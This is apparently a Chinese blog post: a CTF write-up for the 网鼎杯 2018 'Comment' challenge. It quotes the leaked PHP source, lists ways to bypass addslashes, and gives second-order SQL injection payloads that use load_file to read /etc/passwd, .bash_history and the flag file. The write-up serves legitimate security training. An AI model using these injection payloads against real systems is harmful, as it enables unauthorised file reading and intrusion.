[网鼎杯 2018]Comment

最新推荐文章于 2024-04-27 19:27:41 发布
最新推荐文章于 2024-04-27 19:27:41 发布
阅读量4.3k 收藏 9
点赞数 5
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43940853/article/details/105121265
版权

首先爆破弱密码登录,是一个类似留言板的界面,考虑二次注入
git源码泄露
在这里插入图片描述
在这里插入图片描述
这里要恢复一下文件,否则文件内容显示不全

//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

这里的write和comment分别对应发帖和留言界面
可以看到所有参数都进行了addslashes函数处理
正好总结一下绕过addslashes的方式

设置数据库字符为gbk导致宽字节注入
使用icon,mb_convert_encoding转换字符编码函数导致宽字节注入
url解码导致绕过addslashes
base64解码导致绕过addslashes
json编码导致绕过addslashes
没有使用引号保护字符串,直接无视addslashes
使用了stripslashes(去掉了\)
字符替换导致的绕过addslashes
参考
https://bbs.ichunqiu.com/thread-10899-1-1.html

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
闭合情况如下

insert into comment
       set category = ' ',content=user(),/*',
           content = '*/#',
           bo_id = '$bo_id'";

很明显的二次注入。先addslashes转义存入数据库。再从数据库中查询放入sql语句。没有进行转义注,一开始我在纠结为啥不能直接在发帖页面进行注入,原来是addslashes函数,转义后单引号不能在闭合第一个字段category。
后来我又在纠结comment操作时从board取category的值的时候不是也把单引号取出来了吗,在本地测试了一下
在这里插入图片描述
进入数据库后是没有反斜杠的,居然现在这么简单的问题上卡了这么长时间,基础还是不牢,这样comment操作时直接取出单引号就能闭合了

注意#是单行注释

',content=(select(load_file("/etc/passwd"))),/*

在这里插入图片描述
接下来读取文件,注意看到/home/www下以bash身份运行

',content=(select(load_file("/home/www/.bash_history"))),/*

在这里插入图片描述

',content=(select(load_file("/tmp/html/.DS_Store"))),/*

在这里插入图片描述
未显示完全,用hex编码显示

',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

在这里插入图片描述在这里插入图片描述

	',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*

在这里插入图片描述
发现flag是假的

	',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*

在这里插入图片描述

在这里插入图片描述
这个才是真的

WuT0ng
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle comment命令用法示例分享
09-10
Oracle的`COMMENT ON`命令是数据库管理系统中用于添加元数据注释的重要工具,它允许数据库管理员或开发人员为表、列、操作符、索引类型、物化视图等对象添加描述性注释。这些注释有助于提高数据库的可读性和可维护性...
powerdesigner,将name自动填充到注释(comment)。
08-10
在数据库建模过程中,为表、字段等对象添加注释(Comment)是十分重要的,因为它有助于增强代码的可读性和维护性。在PowerDesigner中,可以通过执行脚本来自动化一些重复性任务,例如将字段的名称(Name)自动填充到...
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 525
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
网鼎杯-2018-unfinish解题方法
最新发布
Lemon_miko的博客
04-27 488
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
[网鼎杯 2018]Comment -----不会编程的崽
不会编程的崽的博客
03-25 1067
网鼎杯 二次注入 Git泄露 弱口令
网鼎杯 2018 comment
feng的博客
10-30 693
知识点 爆破弱密码 git泄露 二次注入 .bash_history WP 首先进入环境,是一个留言板的东西,而且按照题目描述的SQL,肯定又是SQL注入了。不过还不能直接留言,需要登录。登录就是爆破密码的后三位,爆出来是zhangwei666,然后登录。 如果提前用dirsearch扫了的话,会发现存在git泄露。利用工具弄下来,得到2个文件,那个关键的文件内容如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器网关...
PowerDesigner 中name和comment 互换脚本
06-12
提供的两个脚本文件——"comment脚本赋值到PDM的name.vbs"和"name脚本赋值到PDM的comment.vbs",其功能分别是将当前对象的comment属性值赋给name,以及将name属性值赋给comment。这样的操作对于批量处理大量对象的...
mysqldocdump-comment-import-markdown
01-16
linux环境运行根据mysql的comment属性导出markdown格式的数据文档 ./mysqldocdump -u user -p xxxx -h 127.0.0.1 -D dbname -o db.md ./mysqldocdump -h markdown查看工具 推荐Typora
网鼎杯-教育
九层台
09-02 1498
beijing 这里可以发现有flag的影子,但是异或之后就没有影子了,获取flag其实就是把异或的部分去掉。 这里就是算法了。 别人写的比较好,用别人的吧。 #include using namespace std; unsigned int byte_804A020[28] = { 0x61, 0x4C, 0x67, 0x59, 0x69, 0x29, 0x6E, ...
CTF_comment_git库泄露&&二次注入_wp
shelter1234567的博客
05-20 470
git是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。攻击者可以利用该漏洞下载git文件夹里的所有内容,如果文件内有敏感信息比如站点源码、数据库账户密码等,攻击者可能通过收集到信息攻击该服务器........
ctf-wp-comment
dahege666的博客
12-18 539
Comment是代表去添加一些评论或者注释 描述中说“程序员GIT写一半跑路了,没来得及Commit”,这是很明显的一个提示 git stash恢复: 最常用的就是使用git clone把github上的源码下载下来,在实际上当你把代码提交给github时是分为两个步骤的:一个git add,另一个是git commit。 在git工具里存在一个缓存区stage,当在工作区写完代码后,首先是使用git add,就是把修改后的代码放到了stage缓存区,但是修改之前的代码也是可以找打...
[BUUCTF]第二天训练
Y4tacker的博客
09-30 3910
文章目录[GWCTF 2019]枯燥的抽奖[网鼎杯 2018]Comment[BJDCTF 2nd]elementmaster[MRCTF2020]套娃[HCTF 2018]WarmUp参考文章 [GWCTF 2019]枯燥的抽奖 打开题目是这玩意儿 查看源代码!!!发现关键网页打开看看!! 下面就是代码审计环节 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start();
sql COMMENT
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值